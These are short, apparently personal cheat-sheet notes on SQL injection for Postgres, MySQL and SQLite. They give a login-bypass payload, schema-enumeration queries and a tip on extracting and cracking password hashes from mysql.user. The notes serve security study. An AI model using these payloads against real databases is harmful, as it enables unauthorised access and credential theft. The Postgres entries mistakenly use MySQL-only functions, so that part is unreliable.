SQL Injection
SQL Injection is a vulnerability where a user can inject SQL commands into a database and execute them
SQL Injection Cheat Sheet | Netsparker
Postgres
Column names case sensitive!!
Syntax: ad' || 'min' or 1=1;--
Version: version()
Quotes: Single for values, double for column name
PostgreSQL: Documentation: 13: Chapter 51. System Catalogs
List tables: select group_concat(table_name) from information_schema.tables where table_schema=database()
List columns: select group_concat(column_name) from information_schema.columns where table_name = 'table'
MySQL
Column names not case sensitive
Note: Password column of mysql.user only exists in mariadb. Use authentication_string for vanilla mysql. May have to use crackstation.
mysql.user Table - MariaDB Knowledge Base
List tables and columns is same as Postgres
Sqlite
Column names not case sensitive
Metadata:
List tables and sql: select tbl_name, sql from sqlite_master
Get character:
substr( string, start, length )SQLite does not support concat function. But it supports || operator.